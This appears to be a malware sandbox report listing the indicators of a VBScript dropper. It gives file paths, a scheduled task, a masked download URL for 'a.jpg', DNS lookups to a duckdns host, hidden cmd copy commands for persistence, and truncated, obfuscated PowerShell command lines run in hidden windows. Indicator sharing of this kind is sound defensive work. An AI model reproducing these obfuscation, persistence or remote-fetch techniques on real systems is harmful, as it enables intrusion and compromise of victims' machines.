Technical Information
- <SYSTEM32>\tasks\hj
- %WINDIR%\microsoft.net\framework\v2.0.50727\aspnet_compiler.exe
- %LOCALAPPDATA%\microsoft\<File name>.vbs
- %TEMP%\lawrhjf.vbs
- http://th#####icabarros.com/a.jpg
- DNS ASK google.com
- DNS ASK th#####icabarros.com
- DNS ASK su#####p.duckdns.org
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\LawrHJf.vbs"
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%LOCALAPPDATA%\Microsoft" /Y' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $df88s99=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal gH4 $df88s99;$iWIEI=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,10...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $df88s99=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal gH4 $df88s99;$iWIEI=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,10...
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%LOCALAPPDATA%\Microsoft" /Y
- '%WINDIR%\microsoft.net\framework\v2.0.50727\aspnet_compiler.exe'